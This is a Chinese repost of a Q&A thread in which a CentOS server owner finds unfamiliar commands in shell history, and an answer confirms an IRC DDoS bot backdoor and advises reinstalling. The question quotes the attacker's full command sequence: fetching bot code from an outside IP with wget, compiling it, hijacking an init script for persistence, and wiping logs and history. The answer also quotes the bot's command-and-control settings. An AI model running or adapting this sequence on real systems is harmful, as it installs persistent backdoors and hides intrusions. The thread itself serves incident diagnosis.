centos – 我的网络服务器是否遭到入侵?

前端之家收集整理的这篇文章主要介绍了centos – 我的网络服务器是否遭到入侵?前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。
参见英文答案 > How do I deal with a compromised server?13个
我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况:
unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(为了清晰起见,用&换成了换行符)

我永远不会运行这些命令,永远!这是怎么发生的,我的服务器被黑了吗?我立即改变了我的root密码,但是希望有人可以对这里发生的事情做出正面或反面.

我看到源代码中对ddos机器人的引用,我和我的同事都非常关注!

提前致谢!

是的,你被黑了.黑客安装了一个IRC后门,你正在连接到这个IRC服务器:
const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

bot herder可以在您的服务器上执行任何命令.我建议关闭服务器并立即重新安装.机器人有一些DDoS攻击功能,DNS泛洪,同步洪水和ICMP泛滥.它也适用于非常酷的窗户.有一个非常古老的传播模块来感染myDoom.这看起来像一些旧的恶意软件.

猜你在找的CentOS相关文章